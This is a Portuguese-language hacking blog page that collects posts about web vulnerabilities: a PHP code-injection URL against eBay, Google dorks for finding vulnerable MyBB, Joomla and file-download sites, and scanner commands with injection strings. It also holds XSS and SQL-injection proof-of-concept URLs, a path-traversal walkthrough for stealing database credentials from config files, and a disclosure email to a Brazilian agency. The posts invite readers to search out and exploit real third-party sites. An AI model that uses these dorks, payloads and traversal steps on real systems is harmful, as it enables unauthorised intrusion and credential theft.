Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador vulneravel. Mostrar todas as postagens
Mostrando postagens com marcador vulneravel. Mostrar todas as postagens

domingo, 15 de dezembro de 2013

Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Remote Code Execution EBay
Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.


Hacker demonstra "execução remota de código PHP" vulnerabilidade no site EBay.

Em um vídeo de demonstração, ele explorou a falha RCE no site eBay, e conseguiu exibir a saída da function nativa do php  phpinfo(), apenas modificando a URL e injetar código.

[URL - ALVO ] https://sea.ebay.com/search/?q=david&catidd=1 

Agora injetando o PHP.
[URL - MODIFICADA] https://sea.ebay.com/search/?q[0]=david&q[1]=sec{${phpinfo()}}&catidd=1


Essa execução só é possível se a página de 'pesquisa' está recebendo "q" valor do parâmetro usando alguma função LOOP como "foreach ()". Muito provavelmente código no final do servidor deve ser algo como:

//php
foreach($_GET['q'] as $dados)
{
 if $dados com sucesso é capaz de ignorar algumas funções de filtro de entrada
{
eval("executar algo aqui  $dados");
}
}
//php

Vídeo:
OBS: A falha já foi corrigida.
Fonte:thehackernews.

quarta-feira, 27 de novembro de 2013

Usando SCANNER INURL para encontrar falhas / Mybb Ajaxfs Plugin Sql Injection vulnerability.

Usando o [ SCANNER INURL 1.0 CONSOLE ], para encontrar erros "Mybb Ajaxfs Plugin Sql Injection vulnerability".

MyBB (MyBulletinBoard) é um software de sistema de fóruns (bulletin board system) desenvolvido pelo grupo MyBB, é escrito utilizando as linguagens PHP e MySQL, está licenciado como um software livre sob uma GNU Lesser General Public License.

Para explorar a falha no plugin Ajaxfs devemos efetuar uma busca, mas vamos usar
SCANNER INURL CONSOLE.

Download SCANNER INURL CONSOLE:
https://code.google.com/p/scanner-inurl/

Dork[1]::: inurl:ajaxfs.php?tooltip=
Dork[2]::: inurl:ajaxfs.php
Dork[3]::: inurl:/ajaxfs ext:php 

Entenda a falha:
http://pastebin.com/XyDrh5SG

Configurando para o scan.
Comando:
php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"

php botConsole.php --host='www.google.com.br' --dork="inurl:ajaxfs.php?tooltip=" --arquivo='resultado.txt' --tipoerro='1' --exploit="'\--0x27;"


Executando

Executando SCANNER INURL





quarta-feira, 26 de setembro de 2012

Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting

Bug Joomla 2.5.6

Bug Joomla 2.5.6
Aviso: Joomla 2.5.6 Múltiplas vulnerabilidades Cross-site scripting
Autor: Stefan Schurtz
Software afetado: testado com sucesso em Joomla 2.5.6
URL Vendedor: http://www.joomla.org/

/*
==========================
Descrição vulnerabilidade
==========================

Com ativado "módulo de linguagem Switcher posição-4." (Extensões -> Módulos -> Gerenciador de Módulo: Módulo de Língua Switcher), XSS são possíveis.

==================
PoC-Exploit
==================*/

//Com o conteúdo de amostra padrão

*/
Dork de busca: inurl:/joomla/index.php/image-gallery/


http://[site]/joomla/index.php/image-gallery/">/25-koala
http://[site]/joomla/index.php/image-gallery/">
http://[site]/joomla/index.php/image-gallery/animals/25-">

=========
solução
=========

FAÇA Upgrade para a versão 2.5.7

Mais simples que comer xoxota nova hashahsa!


quarta-feira, 29 de agosto de 2012

Explorando vulnerabilidade Fopen



Vamos falar de falhas.

Deis uma volta no Google "Uma busca avançada", percebi que 40% de alguns sites estão vulneráveis ao Attack FOPEN é algo simples e de certa forma avassalador se feito por alguém Mal-intencionado.

Referencia:

http://php.net/manual/pt_BR/function.fopen.php

Dork:

site:br inurl:download.php?file=
site:br inurl:baixar.php?arquivo=
inurl:dow.php?file= 

Só exemplos de dorks use sua criatividade.


Com Certeza alguns de vocês já fizeram algum download isso é #fato!.
Hoje vamos dar uma olhada no como o código PHP se comporta no dow.

Site ex: wwww.sitevull.com.br/baixar.php?arquivo=tutorial.pdf

O que acontece é que os GET's passados na URL estão sem validação, Assim com um simples trocar de parâmetro é possível baixar arquivos do site alvo.

ex: wwww.sitevull.com.br/baixar.php?arquivo=index.php
ex: wwww.sitevull.com.br/baixar.php?arquivo=index.html

Assim vai mais digamos, que no mesmo site você tem o seguinte cenário.

wwww.sitevull.com.br/admin

Vamos baixar o index da pasta Admin.

ex: wwww.sitevull.com.br/baixar.php?arquivo=../admin/index.php

Dentro da index Admin #fato que tem uma include ou require pra validar as informações passadas no form.

vamos dizer que encontramos no nosso alvo fictício um include para o arquivo de conexão com banco.


include("/secret/config.php");
?>

Vamos na url vulnerável e baixar o arquivo config.php

ex: wwww.sitevull.com.br/baixar.php?arquivo=../secret/config.php

Conteúdo do tipo.

        $user_site = "web_teste";
$user_site = "testepp";
$senha_site = "testeppg";
$host = "sitevull.com.br ";//IP TESTE
$conexao = mssql_connect($host,$user_site,$senha_site) or die("Erro");
$banco = "gppepe";


Pronto conseguimos acesso ao banco do site sem usar um script ou programa.

Forma errada sem validação:



Forma menos errada sem validação:



sábado, 11 de agosto de 2012

Dork busca vulnerabilidade de injeção SQL joomla.

Dork busca vulnerabilidade de injeção SQL joomla.

A vulnerabilidade de injeção SQL é detectado no módulo com_fireboard do Sistema de Gerenciamento de Conteúdo Joomla.
Atacantes remotos e de baixa contas de usuários privilegiados podem executar / injetar próprios comandos SQL para comprometer a aplicação SGBD.
A vulnerabilidade está localizado no módulo com_fireboard

Módulo vulnerável (s):
[+] index.php?option=com_fireboard

Parâmetro Vulnerável (s):
[+] func fb_

Prova de Conceito:
=================
A vulnerabilidade de injeção SQL pode ser explorada por atacantes remotos sem ação do usuário entre e com baixo
conta de usuário privilegiado.

Dork:inurl:"id=" & intext:"/com_fireboard/"


SITE.com/index.php?option=com_fireboard&Itemid=0&id=1&catid=5&func=fb_pdf'[SQL-INJECTION]
SITE.com/2012/index.php?option=com_fireboard&Itemid=79&id=1&catid=2&func=fb_pdf'[SQL-INJECTION]
SITE.com/fireboard/index.php?option=com_fireboard&Itemid=38&id=22111&catid=16&func=fb_pdf'[SQL-INJECTION]
SITE.com/board/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]
SITE.com/jmfireboard/index.php?option=com_fireboard&Itemid=54&id=70122&catid=12&func=fb_pdf'[SQL-INJECTION]



Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: [email protected] - [email protected] - [email protected]
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

quinta-feira, 5 de julho de 2012

Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa

Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa

Caso encerrado.
Resposta : 

Boa tarde,

O  grupo Google INURL - Brasil
Ficamos satisfeitos pelo retorno.
Não postamos as falhas em nosso blog, vamos postar sua resposta assim 
Dando credibilidade e importância ao ocorrido.

Muito obrigado & Boa noite.
Estamos de olho.

Atenciosamente Grupo Google INURL - Brasil

---- Original Message ----
From: Uilson Azevedo
To: "Google INURL - BRASIL"
Cc: "Carlos Roberto Lacerda Cunha" , "Renata Gomes" , "Mauro Felipe" , "ICMBio Instituto Chico Mendes de Conservação da Biodiversidade"
Sent: Qui, Jul 5, 2012, 16:58 PM
Subject: Re: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa no site http://www4.icmbio.gov.br/

Senhores,


Agradecemos pela observação.

Os sites hospedados no domínio citado (www4.icmbio.gov.br) estão em processo de desativação pois são aplicações legadas e que poderiam mesmo ter vulnerabilidades.

Todas as medidas de segurança e isolamento do host foram tomadas antes de publicar os sites.

Qualquer dúvida estamos à disposição.

Uilson Azevedo
Conforme orientação do Coordenador de Tecnologia
ICMBio

Em 5 de julho de 2012 13:19, Ascom ICMBio <[email protected]> escreveu:
Carlos e Uilson,

chegou este email e achei pertinente que vces analisem, por se tratar da segurança do portal.

Sandra Tavares
9290

---------- Mensagem encaminhada ----------
De: Google INURL - BRASIL <[email protected]>
Data: 5 de julho de 2012 11:52
Assunto: ICMBio - Instituto Chico Mendes de Conservação da Biodiversidade: Vulnerabilidade ativa no site http://www4.icmbio.gov.br/
Para: [email protected]


Este é um e-mail de pedido de informações via http://www.icmbio.gov.br/portal/ de:
Google INURL - BRASIL <[email protected]>

Bom dia,
Venho informa que o site icmbio.gov.br
esta com uma vulnerabilidade SQL INJECTION que da acesso as tabelas usuários administrador do site.

Nível:Critico.

Vulnerabilidade ativa no site Site: www.icmbio.gov.br


Espero um retorno com correção da brecha.

Atenciosamente http://blog.inurl.com.br



--
Divisão de Comunicação Social - DCOM
Instituto Chico Mendes de Conservação da Biodiversidade - ICMBio
Ministério do Meio Ambiente - MMA
EQSW 103/104, Complexo Administrativo, Bloco B, Térreo, Setor Sudoeste, CEP 70.670-350, Brasília-DF
Tel.: (61) 3341-9280 begin_of_the_skype_highlighting            (61) 3341-9280      end_of_the_skype_highlighting a 3341-9294
www.icmbio.gov.br
[email protected]




--
Uilson Azevedo

CTI - Coordenação de Tecnologia
ICMBio - Instituto Chico Mendes de Biodiversidade
Fone: (61) 3341 9606 begin_of_the_skype_highlighting            (61) 3341 9606      end_of_the_skype_highlighting
Celular: (61) 9805 5512 begin_of_the_skype_highlighting            (61) 9805 5512      end_of_the_skype_highlighting

sábado, 26 de fevereiro de 2011

Netsparker: um scanner de segurança web livre de falsos-positivos

 

Netsparker: um scanner de segurança web livre de falsos-positivos

O Netsparker é um scanner de segurança de aplicações web que, de acordo com os desenvolvedores, é completamente livre de falsos- positivos. De acordo com eles, o Netsparker possui uma nova tecnologia que pode confirmar as vulnerabilidades sob demanda, por isso é imune a falso-positivo.

Por exemplo, quando o Netsparker identifica um SQL Injection, ele consegue identificar como explorar a falha automaticamente e extrair a versão da aplicação. Quando este dado for extraído com sucesso, o programa vai informar que a falha foi confirmada.

O Netsparker consegue simular um atacante real com grande sucesso. Assim, consegue atacar sites que utilizam AJAX e JavaScript.

Embora o Netsparker seja pago, existe uma versão "Community" que compartilha muitas das funcionalidades presentes na versão paga. É capaz de detectar SQL Injection e XSS (Cross Site Scripting).

Infelizmente, o Netsparker não funciona no Linux. Ele suporta Windows XP (SP2 ou mais recente), Windows 7, Windows Vista (SP1 ou mais recente), Windows Server 2003 (SP1 ou mais recente) e Windows Server 2008 e precisa de Internet Explorer e .NET Framework 3.5 SP1 na máquina.

download : http://www.mavitunasecurity.com/communityedition/

sexta-feira, 25 de fevereiro de 2011

SCANNER SQLI ONLINE - GOOGLE INURL BRASIL

   Scanner SQLI Google INURL Brasil, utilizando dork simples resultados imediatos sem riscos de virus e   100% gratuito.
uso indevido responsabilidade do usuario todo conteúdo com fins de estudo.